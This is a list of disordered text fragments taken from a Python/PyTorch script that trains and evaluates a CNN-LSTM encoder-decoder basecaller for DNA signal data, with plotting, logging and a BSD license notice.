"len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend()",
"hidden_size, bias=bias) # self.reset_parameters() def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w",
"encoded_target) editd += result num_chars += len(encoded_target) return editd, num_chars def trainNet(model, train_ds,",
"* 100), \"Val Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val + 1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val /",
"bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\")",
"plt.title(\"Accuracy vs. updates\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training",
"self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted, random_value, mode_type, beam_width) #",
"your choosing if clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update encoder and decoder",
"= fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit",
"padded items in the sequence won't be shown to the LSTM packed_seq =",
"== lstm_decoder.batch_size, \"Encoder and decoder must have equal batch size!\" def forward(self, inputs,",
"gate\", \"cell activation\", \"out gate\"]): i += 1 ax = fig.add_subplot(2, 2, i)",
"= 0.0 updates = 0 heatmap_g = None heatmap_w = None heatmap_g_b =",
"n//2 + n//4, n input_biases[idx_b+3, idx] = np.linalg.norm(m[start: end], ord=2) idx_b += 4",
"train_ds[2] signal_len = train_ds[3] label_len = train_ds[4] read_train = train_ds[5] #Get training data",
"cellgate) hy = outgate * F.tanh(cy) #print(\"hy\", hy.size()) hy = torch.unsqueeze(hy, 0).cuda(self.port) #",
"updates = 0 heatmap_g = None heatmap_w = None heatmap_g_b = None heatmap_w_b",
"2: \"G\", 3: \"T\", 4: \"<EOF>\", 5: \"<PAD>\"} # A=0, C=1, G=2, T=3,",
"lstm_encoder = lstm, lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name, param in model12.named_parameters(): if",
"print(\"validation: \", val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size()) # [batch size] is typically",
"== lstm_decoder.hidden_dim, \"Hidden dimensions of encoder and decoder must be equal!\" assert lstm_encoder.num_layers",
"hiddens original_idx = original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:, original_idx,",
"in list(acc_train.values())], label=\"training accuracy\") if validation: ax.plot(list(acc_val.keys()), [v*100 for v in list(acc_val.values())], label=\"validation",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases = False): x_len",
"mode\") parser.add_argument('-s', '--set_seed', type=int, default=1234, help=\"Set seed\") parser.add_argument('-b', '--batch_size', type=int, default=256, help=\"Batch size\")",
"1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\") if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\")",
"convert_to_string(pred, target, target_lengths): import editdistance vocab = {0: \"A\", 1: \"C\", 2: \"G\",",
"= 0 epoch_editd_val = 0 epoch_editd = 0 print(\"=\" * 30) print(\"epoch {}/{}\".format(epoch+1,",
"super().__init__() self.cnn_encoder = cnn_encoder self.lstm_encoder = lstm_encoder self.lstm_decoder = lstm_decoder assert lstm_encoder.hidden_dim ==",
"vs. updates\") ax = fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()), [v*100 for v in list(acc_train.values())],",
"const=True, default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?',",
"# attention self.attn = nn.Linear(self.hidden_dim * 4, 1) #self.attn = nn.Linear(self.hidden_dim * 4,",
"of prediction #if teacher forcing, use actual next token as next input #if",
"30) total_train_loss = 0 loss_iteration = [] acc_iteration = [] editd_iteration = []",
"half of the updates teacher_forcing_ratio = teacher_forcing_ratio * 0.95 else: teacher_forcing_ratio # Evaluation",
"bias=bias) self.port = port def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w",
"math.sqrt(self.hidden_size) for w in self.parameters(): w.data.uniform_(-std, std) def forward(self, x, hidden): h, c",
"CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;",
"val_ds != None: val_loader = get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val, input_y10_val, batch_size=batch_size, shuffle=True) if",
"{} dict_activations_out_decoder = {} dict_training_loss = {} dict_validation_loss = {} dict_training_acc = {}",
"f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model has {:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={},",
"hidden_size, bias=bias) self.port = port def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for",
"= train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds = val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path",
"1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOF>\", 5: \"<PAD>\"} # A=0, C=1,",
"ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation",
"if forget_bias != \"None\" and \"lstm_encoder\" in name: print(name,param.data.size()) n = param.size(0) #",
"0 epoch_acc_val = 0 epoch_editd_val = 0 epoch_editd = 0 print(\"=\" * 30)",
"wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\") if validation: ax.plot(list(loss_val.keys()),",
"= nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers,",
"= np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) # ed2 = ed # else: # ed =",
"x.gather(0, index_sorted_idx.long()) # [batch, seq_len, input_dim] # pack_padded_sequence so that padded items in",
"type in Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int, default=[1, 1, 1], help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel',",
"val_editd = [] model.eval() total_ed = 0 total_num_chars = 0 with torch.no_grad(): for",
":] # [batch, seq_len, input_dim] lab_len = lab_len[negative_idx] labels = labels[negative_idx, :] labels10",
"y_len_biases] df_b = pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\")",
"[batch size] is typically chosen between 1 and a few hundreds, e.g. [batch",
"= val_acc if editD: dict_validation_editd[epoch] = val_editd # early_stopping needs the validation loss",
"f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\")",
"forgetgate = F.sigmoid(forgetgate) cellgate = F.tanh(cellgate) outgate = F.sigmoid(outgate) cy = (forgetgate *",
"permitted provided that the following conditions are met: 1. Redistributions of source code",
"# ingate start, end = 0, n//4 # ordering ingate, forgetgate, cellgate, outgate",
"beam_width=1): ########################################### ##### Encoder ############################# ########################################### #### CNN #Forward pass, backward pass, optimize",
"False, port=1, attention=True, dropout=0): super(LSTMdecoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size",
"PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR",
"range(max_label_len) outputs = torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) # [max. target length, batch size, hidden",
"gate bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # teacher forcing",
"class Seq2Seq(nn.Module): def __init__(self, cnn_encoder, lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder = cnn_encoder self.lstm_encoder =",
"input_size #### LSTM if (seq_len_cnn <= 0.).sum().item() > 0: # remove neagtive samples",
"lstm, lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name, param in model12.named_parameters(): if \"bias\" in",
"for x in y_len] df = pd.DataFrame(input, index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm =",
"title=\"\"): sns.set(font_scale=1) fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.5) i =",
"editD: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation",
"target length, batch size, output dim] top1 = input_decoder.argmax(1) # get argmax of",
"in %\") plt.legend() plt.title(\"Accuracy vs. updates\") if editD: ax = fig.add_subplot(1, 3, 3)",
"[] val_editd = [] model.eval() total_ed = 0 total_num_chars = 0 with torch.no_grad():",
"= 0 for p, label in zip(input, [\"input gate\", \"forget gate\", \"cell activation\",",
"help=\"Number of hidden units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number of layers in",
"import os import sys import torch import torch.nn as nn from torch.autograd import",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--patience', type=int, default=25, help=\"Patience in early stopping\") parser.add_argument(\"--call\",",
"sorted_idx = x_lengths.sort(0, descending=True) index_sorted_idx = sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs = x.gather(0, index_sorted_idx.long())",
"#decide if we are going to use teacher forcing or not teacher_force =",
"[val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \", train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(),",
"p in seq: if p == 4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred) encoded_target",
"f = open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile + \" \\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue",
"# pack_padded_sequence so that padded items in the sequence won't be shown to",
"for p, label in zip(input, [\"input gate\", \"forget gate\", \"cell activation\", \"out gate\"]):",
"editd_val = input[0], input[1], input[2], input[3], input[4], input[5] max_idx_train = max(acc_train, key=lambda k:",
"batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional = bidir, port=port, dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim",
"print(start, end) if forget_bias_decoder != \"None\" and \"lstm_decoder\" in name and \"linear\" not",
"= 0 old_ed = 0 if reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for",
"in source and binary forms, with or without modification, are permitted provided that",
"in name and len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None, steps=50, validation=True, editD=True):",
"f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\")",
"batch shape for input x is [batch, seq_len, input_dim] def __init__(self, input_dim, hidden_dim,",
"labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1): ########################################### ##### Encoder ############################# ########################################### #### CNN #Forward pass,",
"\"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration + 1)) * 100), \"Val Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val",
"= nn.Linear(self.hidden_dim * 2, self.hidden_dim) self.linear = nn.Linear(self.hidden_dim, self.output_dim) def forward(self, encoder_outputs, true_x_len,",
"default=\"0\", help=\"Set forget gate bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set forget gate",
"= {} dict_validation_acc = {} dict_training_editd = {} dict_validation_editd = {} dict_training_loss2 =",
"make_validation == 0: print(\"=\" * 30) print(\"batch {} in epoch {}/{}\".format(iteration+1, epoch+1, n_epochs))",
"= [] val_acc = [] val_editd = [] model.eval() total_ed = 0 total_num_chars",
"target length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(),",
"num_chars def trainNet(model, train_ds, optimizer, criterion, clipping_value=None, val_ds=None, test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True,",
"None counter_updates_teacherForcing = 0 old_ed = 0 if reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min')",
"n = matrix_param[p].shape[0] # input gate start, end = 0, n//4 input_biases[idx_b, idx]",
"n # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) model12 = model12.cuda(port)",
"== reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc running_acc_train += acc acc_iteration.append(acc) #if",
"model12 = model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if sgd: optimizer = optim.SGD(model12.parameters(), lr=lr, momentum=0) else:",
"index_sorted_idx = sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs = x.gather(0, index_sorted_idx.long()) # [batch, seq_len, input_dim]",
"val_loader = get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val, input_y10_val, batch_size=batch_size, shuffle=True) if earlyStopping: # initialize",
"dict_validation_acc = {} dict_training_editd = {} dict_validation_editd = {} dict_training_loss2 = {} dict_validation_loss2",
"CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED",
"\", update= \", updates, \", half of updates= \", int((len(train_loader) * n_epochs)*0.5)) #",
"= {} dict_validation_editd2 = {} dict_weights = {} dict_gradients = {} running_loss_train =",
"h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden = (h1,",
"= reshaped_sorted_labels != 5 # indices of not padded elements loss = criterion(reshaped_output,",
"pd import argparse from distutils.util import strtobool from polyleven import levenshtein sys.path.insert(0, '/basecaller-modules')",
"default=1, help=\"Number of layers in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type in Encoder-CNN\") parser.add_argument('--strides',",
"n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) # ingate start,",
"# shape of lstm_in: [batch, seq_len, input_dim] # shape of lstm_out: [batch, seq_len,",
"1).contiguous() # input for LSTM seq_length x out_size # Calculate cross entropy loss",
"for v in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs.",
"__init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_encoder = False, bidirectional=False, port=1, dropout=0): super(LSTMencoder,",
"h, c = hidden h = h.view(x.size(0), -1) c = c.view(x.size(0), -1) x",
"# ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) # cellgate, outgate start,",
"x in seq_target[0:length]]) result = editdistance.eval(encoded_pred, encoded_target) editd += result num_chars += len(encoded_target)",
"labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted, random_value, mode_type, beam_width) # seq_length x batch_size x",
"loss_val.item() running_loss_val += loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0)",
"trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={}, earlyStopping={}, patience={}, weight decay={}, clipping value={}, lr={}\\n\"",
"#Wrap them in a Variable object inputs, labels, labels10 = Variable(batch_x, requires_grad=False), Variable(batch_y,",
"(updates == n_epochs-1)): if reduced_TF: #if updates > int((len(train_loader) * n_epochs)*0.5) and teacher_forcing_ratio",
"not_padded_batches, :] hidden = (h, c) label = y[not_padded_batches, :, i] # batch-i,",
"##### Encoder ############################# ########################################### #### CNN #Forward pass, backward pass, optimize in_lstm, seq_len_cnn",
"ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\")",
"clipping_value = args.gradient_clip # LSTM hidden = args.hidden_units #256 forget_bias = args.forget_bias_encoder forget_bias_decoder",
"f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(), val_set[4]))",
"= int(length.item()) seq = pred[idx] seq_target = target[idx] encoded_pred = [] for p",
"= np.zeros((len(y_len), len(x_len))) input_grad = np.zeros((len(y_len), len(x_len))) if split_LSTMbiases: y_len_biases = [] for",
"= [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \", train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(),",
"# (batch, seq, feature), lstm_in_unroll, hidden = self.lstm_unroll(input, hidden) # [batch size, seq,",
"self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x, x_lengths): #hidden = self.init_hidden() # Forward pass through",
"{} dict_training_acc2 = {} dict_validation_acc2 = {} dict_training_editd2 = {} dict_validation_editd2 = {}",
"0 epoch_editd = 0 print(\"=\" * 30) print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\" * 30)",
"ATTENTION MECHANISM attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]), dim=1)), dim=1) # encoder",
"batch_y10_val = data_val[4] inputs_val, labels_val, labels10_val = Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False)",
"train_ds = train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds = val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation,",
"Redistributions of source code must retain the above copyright notice, this list of",
"% make_validation == 0: print(\"=\" * 30) print(\"batch {} in epoch {}/{}\".format(iteration+1, epoch+1,",
"dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]]) def count_parameters(model):",
"SimpleCNN, BasicBlock, SimpleCNN_res from cnn import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class Range(object): def",
"good default value CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type,",
"print(df.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure = svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename))",
"kernel size = 11 start = time.time() out12 = trainNet( model12, train_ds =",
"3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy",
"= own_cell_decoder self.bidirectional = bidirectional self.port=port self.attention = attention self.dropout = dropout #",
"forget gate bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set forget gate bias in",
"pass through LSTM layer # shape of lstm_in: [batch, seq_len, input_dim] # shape",
"dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: if self.attention:",
"following disclaimer in the documentation and/or other materials provided with the distribution. THIS",
"\"out gate\"]): i += 1 ax = fig.add_subplot(2, 2, i) for epoch in",
"hundreds, e.g. [batch size] = 32 is a good default value CNN =",
"between 1 and a few hundreds, e.g. [batch size] = 32 is a",
"/ float(iteration_val + 1)) * 100)) print(\"=\" * 100) dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch]",
"x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0), help=\"Teacher forcing ratio. Default=1, TF",
"'updates': out12[-1], 'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname),",
"position: seq, 0:true_batch_size, features # rest: seq, true_batch_size:max_seq_len, features filled with 0 outputs[i,",
"of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce",
"out dim), target = (seq*batch) # Target nicht one-hot encoden reshaped_output_val = output_val.view(-1,",
"BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,",
"attn_applied.squeeze(1)), dim=1) # input_decoder: b,hidden; attn_applied: b, 1, hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port)",
"LSTM seq_length x out_size # Calculate cross entropy loss # output = (seq*batch,",
"lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name, param in model12.named_parameters(): if \"bias\" in name:",
"size!\" def forward(self, inputs, seq_len, teacher_forcing_ratio, labels=None, lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1): ###########################################",
"{} dict_activations_cell = {} dict_activations_out = {} dict_activations_in_decoder = {} dict_activations_forget_decoder = {}",
"!= \"None\" and \"lstm_encoder\" in name: print(name,param.data.size()) n = param.size(0) # forget gate",
"f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal",
"Redistribution and use in source and binary forms, with or without modification, are",
"requires_grad=False), Variable(batch_y10, requires_grad=False) # batch_size x out_size x seq_length output, sorted_labels, sorted_labels_len =",
"gate start, end = n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder)))",
"edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates\") if pdf",
"they match with order in batch labels_sorted = labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted =",
"PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR",
"to the last element in the batch if i == max_in_batch: break #",
"make_validation == 0: # ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) # ed2 = ed",
"validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val],",
"USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY",
"batch size={}, earlyStopping={}, patience={}, weight decay={}, clipping value={}, lr={}\\n\" .format(epochs, batch, earlyStopping, patience_earlyStop,",
"FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT",
"DataLoader from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import OneHotEncoder from torch.utils.tensorboard import SummaryWriter",
"Sort instances by sequence length in descending order #print(\"in length\", x_lengths) sorted_len, sorted_idx",
"= {} dict_validation_acc2 = {} dict_training_editd2 = {} dict_validation_editd2 = {} dict_weights =",
"updates evaluation on the validation set\") # CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?',",
"end = 0, n//4 input_biases[idx_b, idx] = np.linalg.norm(m[start: end], ord=2) # forget gate",
"param.data[start:end].fill_(float(int(forget_bias))) print(start, end) # ingate start, end = 0, n//4 # ordering ingate,",
"OF SUCH DAMAGE. \"\"\" import h5py import numpy as np import os import",
"for v in list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs.",
"parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number of layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set forget",
"self.bias = bias self.i2h = nn.Linear(input_size, 4 * hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size,",
"training data train_loader = get_train_loader_trainVal(input_x, signal_len, input_y, label_len, input_y10, batch_size=batch_size, shuffle=True) if val_ds",
":] # sort labels so that they match with order in batch labels_sorted",
"n//4, n input_biases[idx_b+3, idx] = np.linalg.norm(m[start: end], ord=2) idx_b += 4 y_len =",
"args.dropout_cnn dropout_input = args.dropout_input dropout_probability = args.drop_prob call = args.call lr = args.learning_rate",
"running_acc_val += acc_val val_acc.append(acc_val) if editD: ed_val, num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val",
"input input_decoder = label if teacher_force else onehot # [batch size, out dim]",
"= model(inputs, seq_len, teacher_forcing_ratio, labels, lab_len, labels10, labels.size(1), mode) output = torch.transpose(output, 0,",
"directory file_out = script_dir + \"/\" + infile print(file_out) with open(file_out, 'rb') as",
"def forward(self, x, hidden): h, c = hidden h = h.view(h.size(0), -1) c",
"reduced_TF: #if updates > int((len(train_loader) * n_epochs)*0.5) and teacher_forcing_ratio >= 0.5: if (running_acc_train",
"f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length:",
"(ingate * cellgate) hy = outgate * F.tanh(cy) #print(\"hy\", hy.size()) hy = torch.unsqueeze(hy,",
"list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len), len(x_len))) input_grad = np.zeros((len(y_len), len(x_len))) if",
"editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train #/",
"data_val[2] lab_len_val = data_val[3] batch_y10_val = data_val[4] inputs_val, labels_val, labels10_val = Variable(batch_x_val, requires_grad=False),",
"default=True) parser.add_argument('-c', '--channel_number', type=int, default=256, help=\"Number of output channels in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers',",
"import matplotlib.ticker as ticker from matplotlib.backends.backend_pdf import PdfPages import math import torch.optim as",
"IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND",
"shape for input x is [batch, seq_len, input_dim] def __init__(self, input_dim, hidden_dim, batch_size,",
"1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOS>\", 5: \"<PAD>\"} editd = 0",
"else: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 2, 1) #self.attn =",
"batch_first=True, bidirectional=False, dropout=self.dropout) else: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False,",
"ed_val val_editd.append(ed_val) total_ed += ed_val total_num_chars += num_char_ref if editD: cer = float(total_ed)",
"= [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for x in y_len_biases] df_b = pd.DataFrame(input_biases, index=y_len_biases, columns=x_len)",
